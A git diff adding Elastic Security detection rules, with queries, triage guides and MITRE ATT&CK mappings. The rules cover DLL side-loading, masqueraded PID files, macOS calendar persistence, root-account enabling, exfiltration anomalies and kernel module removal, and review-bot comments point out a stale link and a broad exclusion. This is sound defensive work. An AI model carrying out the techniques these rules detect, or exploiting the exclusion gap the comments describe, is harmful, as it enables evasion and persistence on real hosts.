\"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current 
directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "dll.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": false, + "name": "dll.Ext.relative_file_name_modify_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", 
+ "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_213.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_213.json new file mode 100644 index 00000000000..f3e8112e176 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_213.json 
@@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a Process ID (PID), lock or reboot file created in temporary file storage paradigm (tmpfs) directory /var/run. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files.", + "false_positives": [ + "False-Positives (FP) can appear if the PID file is legitimate and holding a process ID as intended. To differentiate, if the PID file is an executable or larger than 10 bytes, it should be ruled suspicious." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Abnormal Process ID or Lock File Created", + "new_terms_fields": [ + "host.id", + "process.executable", + "file.path" + ], + "note": "## Triage and analysis\n\n### Investigating Abnormal Process ID or Lock File Created\n\nLinux applications may need to save their process identification number (PID) for various purposes: from signaling that a program is running to serving as a signal that a previous instance of an application didn't exit successfully. PID files contain its creator process PID in an integer value.\n\nLinux lock files are used to coordinate operations in files so that conflicts and race conditions are prevented.\n\nThis rule identifies the creation of PID, lock, or reboot files in the /var/run/ directory. Attackers can masquerade malware, payloads, staged data for exfiltration, and more as legitimate PID files.\n\n#### Possible investigation steps\n\n- Retrieve the file and determine if it is malicious:\n - Check the contents of the PID files. 
They should only contain integer strings.\n - Check the file type of the lock and PID files to determine if they are executables. This is only observed in malicious files.\n - Check the size of the subject file. Legitimate PID files should be under 10 bytes.\n - Check if the lock or PID file has high entropy. This typically indicates an encrypted payload.\n - Analysts can use tools like `ent` to measure entropy.\n - Examine the reputation of the SHA-256 hash in the PID file. Use a database like VirusTotal to identify additional pivots and artifacts for investigation.\n- Trace the file's creation to ensure it came from a legitimate or authorized process.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- False positives can appear if the PID file is legitimate and holding a process ID as intended. If the PID file is an executable or has a file size that's larger than 10 bytes, it should be ruled suspicious.\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of file name and process executable conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Block the identified indicators of compromise (IoCs).\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:linux and event.category:file and event.action:(creation or file_create_event) and\nuser.id:0 and file.extension:(pid or lock or reboot) and file.path:(/var/run/* or /run/*) and (\n (process.name : (\n bash or dash or sh or tcsh or csh or zsh or ksh or fish or ash or touch or nano or vim or vi or editor or mv or cp)\n ) or (\n process.executable : (\n ./* or /tmp/* or /var/tmp/* or /dev/shm/* or /var/run/* or /boot/* or /srv/* or /run/*\n ))\n) and not process.name : (go or git or containerd* or snap-confine or cron or crond or sshd or unattended-upgrade or \nvzctl or ifup or rpcbind or runc or gitlab-runner-helper or elastic-agent or metricbeat) and\nnot file.name : (jem.*.pid)\n", + "references": [ + "https://www.sandflysecurity.com/blog/linux-file-masquerading-and-malicious-pids-sandfly-1-2-6-update/", + "https://twitter.com/GossiTheDog/status/1522964028284411907", + "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cac91072-d165-11ec-a764-f661ea17fbce", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. 
[Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: BPFDoor", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 213 + }, + "id": "cac91072-d165-11ec-a764-f661ea17fbce_213", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_106.json b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_106.json new file mode 100644 index 00000000000..09bdacd1a1e --- /dev/null 
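Review bot: The `setup` text of cac91072-d165-11ec-a764-f661ea17fbce_213.json links to a version-pinned docs page, `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, while the sibling rules added in this commit (e.g. cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_106.json) link to `https://www.elastic.co/guide/en/fleet/current/agent-policy.html`; the pinned URL will go stale as the stack moves on. Suggested change: replace `fleet/8.10/` with `fleet/current/` in this `setup` string. cd66a5af-e34b-4bb0-8931-57d0a043f2ef_108.json carries the same pinned link.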
+++ b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_106.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious modifications of the calendar file by an unusual process. Adversaries may create a custom calendar notification procedure to execute a malicious program at a recurring interval to establish persistence.", + "false_positives": [ + "Trusted applications for managing calendars and reminders." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Calendar File Modification", + "query": "event.category:file and host.os.type:macos and event.action:modification and\n file.path:/Users/*/Library/Calendars/*.calendar/Events/*.ics and\n process.executable:\n (* and not\n (\n /System/Library/* or\n /System/Applications/Calendar.app/Contents/MacOS/* or\n /System/Applications/Mail.app/Contents/MacOS/Mail or\n /usr/libexec/xpcproxy or\n /sbin/launchd or\n /Applications/*\n )\n )\n", + "references": [ + "https://labs.f-secure.com/blog/operationalising-calendar-alerts-persistence-on-macos", + "https://github.com/FSecureLABS/CalendarPersist", + "https://github.com/D00MFist/PersistentJXA/blob/master/CalendarPersist.js" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_106.json b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_106.json new file mode 100644 index 00000000000..7187ff683a4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_106.json 
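Review bot: The `process.executable` exclusion list in the `query` of cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_106.json ends with `/Applications/*`, which excludes every executable under that prefix rather than the specific calendar-handling binaries the other entries name, so any application installed under /Applications, whatever its provenance, is invisible to this rule. If the intent is to suppress third-party calendar clients, consider listing them explicitly, or at least record the trade-off in `false_positives`, e.g. `"Applications installed under /Applications are excluded from this rule; modifications by such applications are not alerted on."`.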
@@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to enable the root account using the dsenableroot command. This command may be abused by adversaries for persistence, as the root account is disabled by default.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Attempt to Enable the Root Account", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:dsenableroot and not process.args:\"-d\"\n", + "references": [ + "https://ss64.com/osx/dsenableroot.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cc2fd2d0-ba3a-4939-b87f-2901764ed036", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "cc2fd2d0-ba3a-4939-b87f-2901764ed036_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cc653d77-ddd2-45b1-9197-c75ad19df66c_3.json b/packages/security_detection_engine/kibana/security_rule/cc653d77-ddd2-45b1-9197-c75ad19df66c_3.json new file mode 100644 index 00000000000..e5cfece1f36 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cc653d77-ddd2-45b1-9197-c75ad19df66c_3.json 
@@ -0,0 +1,64 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected data exfiltration to a particular geo-location (by IP address). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels.", + "from": "now-6h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "ded_high_sent_bytes_destination_ip", + "name": "Potential Data Exfiltration Activity to an Unusual IP Address", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/ded", + "https://www.elastic.co/blog/detect-data-exfiltration-activity-with-kibanas-new-integration" + ], + "related_integrations": [ + { + "package": "ded", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "risk_score": 21, + "rule_id": "cc653d77-ddd2-45b1-9197-c75ad19df66c", + "setup": "## Setup\n\nThe rule requires the Data Exfiltration Detection integration assets to be installed, as well as network and file events collected by integrations such as Elastic Defend and Network Packet Capture (for network events only). \n\n### Data Exfiltration Detection Setup\nThe Data Exfiltration Detection integration detects data exfiltration activity by identifying abnormalities in network and file events. Anomalies are detected using Elastic's Anomaly Detection feature. 
\n\n#### Prerequisite Requirements:\n- Fleet is required for Data Exfiltration Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Network events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) or [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n\n#### The following steps should be executed to install assets associated with the Data Exfiltration Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Data Exfiltration Detection and select the integration to see more details about it.\n- Under Settings, click Install Data Exfiltration Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Data Exfiltration Detection, you'll need to enable the corresponding Anomaly Detection jobs. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your network data. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `logs-network_traffic.*` if you used Network Packet Capture.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/ded/kibana/ml_module/ded-ml.json) configuration file, you will see a card for Data Exfiltration Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "cc653d77-ddd2-45b1-9197-c75ad19df66c_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_108.json b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_108.json new file mode 100644 index 00000000000..9912da5fe20 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_108.json 
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.", + "false_positives": [ + "There is usually no reason to remove modules, but some buggy modules require it. These can be exempted by username. Note that some Linux distributions are not built to support the removal of modules at all." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Module Removal", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and\nprocess.name == \"rmmod\" or (process.name == \"modprobe\" and process.args in (\"--remove\", \"-r\")) and \nprocess.parent.name in (\"sudo\", \"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "references": [ + "http://man7.org/linux/man-pages/man8/modprobe.8.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cd66a5af-e34b-4bb0-8931-57d0a043f2ef", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "cd66a5af-e34b-4bb0-8931-57d0a043f2ef_108", + "type": "security-rule" +} 